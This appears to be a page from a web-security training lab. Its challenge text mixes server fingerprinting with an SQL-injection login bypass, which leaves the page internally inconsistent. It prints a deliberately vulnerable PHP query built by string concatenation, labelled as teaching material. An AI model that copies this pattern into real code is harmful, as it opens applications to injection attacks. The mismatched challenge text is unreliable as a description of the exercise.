easy

Level 1: Server Fingerprinting (No Server Header)

Recon

Challenge Description

The origin hides its Server header. Determine which web server powers this app anyway.

Objective

Bypass the login form without knowing valid credentials and retrieve the admin's secret data.

What you'll learn
  • How SQL queries can be manipulated through user input
  • The danger of string concatenation in SQL
  • Basic SQL injection techniques
Need a Hint?
Trigger a server-generated error (e.g., 405 at /probes/methods) to fingerprint behavior.

Consider this query structure:

SELECT * FROM users 
WHERE username = 'INPUT' 
AND password = 'INPUT'

What happens if you input a single quote?

SecureCorp Admin Portal

Authorized Personnel Only
Password field shown as text for educational purposes
Vulnerable Code (for learning)
$query = "SELECT * FROM users 
          WHERE username = '$username' 
          AND password = '$password'";

$result = $conn->query($query);
This code is intentionally vulnerable. Never use string concatenation for SQL queries!